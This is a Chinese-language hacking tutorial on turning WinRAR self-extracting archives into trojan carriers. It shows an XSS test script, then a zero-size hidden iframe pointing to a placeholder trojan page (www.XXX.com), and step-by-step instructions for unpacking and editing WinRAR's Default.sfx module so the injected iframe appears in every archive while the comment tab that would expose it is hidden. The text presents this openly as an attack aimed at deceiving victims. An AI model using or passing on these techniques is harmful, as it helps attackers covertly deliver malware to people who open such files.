一、WinRAR與木馬結合的優點

    大家都知道WinRAR軟件可以制作EXE自解壓文件，以方便沒有安裝WinRAR軟件的用戶。WinRAR制作的自解壓文件非常常見，而且不少軟件也開始采用它來制作安裝程序。用WinRAR制作自解壓文件時，還可以對自解壓界面進行自定義美化，在自解壓時顯示任意的文件或圖片。我們可以通過對WinRAR自解壓文件界面的再定義，從而欺騙對方在解壓前執行網頁木馬。

    二、簡單測試

    首先，我們需要制作一個WinRAR自解壓文件?？梢詫⑷我赓Y源，比如幾張圖片或音樂之類的打包壓縮成RAR格式。然后用WinRAR打開壓縮包，點擊WinRAR工具欄上的“自解壓”按鈕，打開自解壓文件制作對話框。在“自解壓模塊”中選擇“Deault.sfx”模塊，點擊“高級自解壓選項”按鈕，打開高級自解壓選項設置對話框。選擇“文本和圖標”選項卡，在下面的“自解壓文件窗口中顯示的文本”區里，可以輸人任意文字，都將顯示在自解壓界面中。如果我們輸入網頁代碼，是否會執行呢？

    這里我們先來測試一下，在文本輸入區中，輸入如下代碼：

    <script>alert('nethack')</script>

    這段代碼常常被用來檢測跨站漏洞，如果存在漏洞的話，那么在網頁中會彈出一個文字提示對話框。點擊“確定”按鈕，返回自解壓對話框，再點擊“確定”按鈕，即可在壓縮包文件路徑下，生成一個同名的后綴為.exe的自解壓文件?，F在，我們來雙擊這個自解壓文件，看看前面的跨站檢測代碼是否執行？自解壓文件打開后，同時彈出了剛才設置的文字提示對話框，說明網頁代碼執行了。

    由此可見，WinRAR的自解壓文件界面存在著跨站掛馬的漏洞，我們完全可以修改剛才的測試代碼，讓自解壓文件在打開時顯示任意的網頁，當然也可以顯示木馬網頁，從而實現利用WinRAR自解壓文件掛網頁木馬的攻擊目的！

三、自解壓掛網頁木馬

    現在，我們來制作一個具有掛馬攻擊性的WinRAR自解壓文件。首先，準備一個網頁木馬，并將其上傳到某個網站空間中去。這里假設網頁木馬鏈接地址為“http://www.XXX.com/01.htm”。然后制作一個自解壓文件，方法與前面相同，但是在寫入文本框中，我們需要輸入如下代碼：

    <iframe width=0 height=0 src="http://www.XXX.com/01.htm"></iframe>

    這段代碼表示顯示一個長寬都為0網頁象素，也就是不可見的頁面框架，顯示的網頁內容為指定的木馬網頁。確定后即可制作成功一個掛馬攻擊的WinRAR自解壓文件了。但是這里為了便于抓圖顯示攻擊效果，我們將掛馬語句改為了：

    <iframe width=800 height=800 src="http://www.baidu.com"></iframe>

    表示顯示一個長寬為300的頁面框架，顯示的網頁內容為百度首頁。雙擊打開我們加入了掛馬代碼的WinRAR自解壓文件時，可以在自解壓界面窗口中看到顯示了百度網頁。由此可見掛成功！只要將代碼換為真實的掛馬代碼，那么在WinRAR自解壓界面中，就會顯示空白頁面，同時隱藏的打開木馬網頁，根本察覺不到任何攻擊的癥狀！

四、掛馬自解壓包的不足

    雖然用上面的方法制作出來的WinRAR自解壓木馬，在攻擊時可以沒有任何癥狀，但是還是有缺陷的。首先，使用代碼隱藏掛馬，雖然不會顯示木馬網頁，但是界面中變成空白頁面，不會顯示默認的提示信息。另外，所有制作的帶有腳本的自解壓文件，在其“屬性”中都會多出“注釋”選項卡，即使是不帶攻擊性的自解壓文件也是如此。我們用右鍵點擊剛才制作的自解壓文件，在彈出菜單中選擇“屬性”命令，打開屬性對話框。選擇“注釋”選項頁，如此一來，就會暴露在創建自解壓格式壓縮文件時設置的掛馬代碼了。

    五、木馬保護更強悍

    那么，如何才能讓隱藏注釋信息，讓掛馬攻擊的自解壓包文件更完美呢？其實，自解壓文件的“注釋”信息，來源于WinRAR中的“Deault.sfx”自解壓模塊。我們完全可以修改此模塊，讓自解壓文件不顯示“注釋”信息。

    在WinRAR安裝目錄下，可以找到模塊文件“Deault.sfx”。在修改前，可用Peid查殼，發現文件加了UPX殼，用UPX Shell對其脫殼即可。  

    下載安裝“eXeScope資源修改器”，用eXeScope打開“Deault.sfx”文件。在eXeScope左邊的列表中，展開“資源”→“字符串表”→“l0”→“中文（中國）”，在右邊列表出現的150到155的字符串為默認自解壓文件的自解壓文件窗口中顯示的文本代碼，每行字串長度不能超過250個英文字符。我們可進行修改，以達到隱藏掛馬的目的，在155行代碼的最后添加如下掛馬代碼：

    <iframe width=800 height=800 src="http://www.baidu.com"></iframe>

    修改完畢后，關閉eXeScope，保存更新“Deault.sfx”文件。然后直接創建一個WinRAR自解壓文件，無需在其中添加掛馬代碼了，此時創建和自解壓文件中自動顯示了掛馬網頁（如圖11）。但是在文件屬性中，卻根本看不到“注釋”選項頁，這樣就實現了隱藏“注釋”信息。如果我們掛馬框架長寬為0的話，在自解壓界面中顯示的是“單擊安裝按鈕開始解壓……”之類的默認信息，也不會出現前面的空白頁。

    這樣，一個極度完美的WinRAR自解壓木馬便制作成功了！你能找出它與普通自解壓文件有什么不同嗎？